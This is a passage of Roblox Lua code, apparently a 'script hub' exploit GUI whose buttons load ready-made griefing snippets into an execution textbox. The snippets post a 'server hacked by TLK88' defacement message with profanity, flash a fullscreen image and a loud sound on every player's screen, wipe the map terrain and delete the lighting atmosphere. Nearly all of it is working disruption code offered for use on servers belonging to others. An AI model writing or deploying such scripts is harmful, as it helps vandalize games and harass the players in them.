		label.Position = UDim2.new(0, 10, 1, -60)
		label.BackgroundTransparency = 1
		label.TextColor3 = Color3.new(1, 1, 1)
		label.TextScaled = true
		label.Font = Enum.Font.SourceSansBold
		label.Text = "this server has been hacked by TLK88 you fucking noobs! prepare for chaos!"
		label.Parent = gui
	end
	]],
		clearwater = "workspace.Terrain:Clear()",
		trollall = [[
	for _, player in pairs(game.Players:GetPlayers()) do
		local gui = Instance.new("ScreenGui")
		gui.Name = "TLK88Troll"
		gui.ResetOnSpawn = false
		gui.Parent = player:WaitForChild("PlayerGui")
	
		local img = Instance.new("ImageLabel")
		img.Size = UDim2.new(1, 0, 1, 0)
		img.Position = UDim2.new(0, 0, 0, 0)
		img.BackgroundTransparency = 1
		img.Image = "rbxassetid://94667677722688"
		img.Parent = gui
	
		local sound = Instance.new("Sound")
		sound.SoundId = "rbxassetid://136247552074672"
		sound.Volume = 100
		sound.Looped = false
		sound.Parent = gui
		sound:Play()
	
		task.delay(8, function()
			gui:Destroy()
		end)
	end
	]],
		atmosphere = [[
	for _, obj in pairs(game.Lighting:GetChildren()) do
		if obj:IsA("Atmosphere") then
			obj:Destroy()
		end
	end
	]]
	}
	
	-- Safety check
	if not textbox then
		warn("❌ TextBox not found.")
		return
	end
	
	-- Connect each button dynamically
	for name, code in pairs(buttons) do
		local btn = scriptHubFrame:FindFirstChild(name)
		if btn and btn:IsA("TextButton") then
			btn.MouseButton1Click:Connect(function()
				textbox.Text = code
			end)
		end
	end
	
	-- Wire ClearWater button logic
	local clearBtn = scriptHubFrame:FindFirstChild("clearwater")
	if clearBtn and clearBtn:IsA("TextButton") then
		clearBtn.MouseButton1Click:Connect(function()
			textbox.Text = buttons.clearwater
		end)
	end
	
	-- Wire Atmosphere button logic
	local atmosphereBtn = scriptHubFrame:FindFirstChild("atmosphere")
	if atmosphereBtn and atmosphereBtn:IsA("TextButton") then
		atmosphereBtn.MouseButton1Click:Connect(function()
			textbox.Text = buttons.atmosphere
		end)
	end
end;
task.spawn(C_e);

return G2L["1"], require;
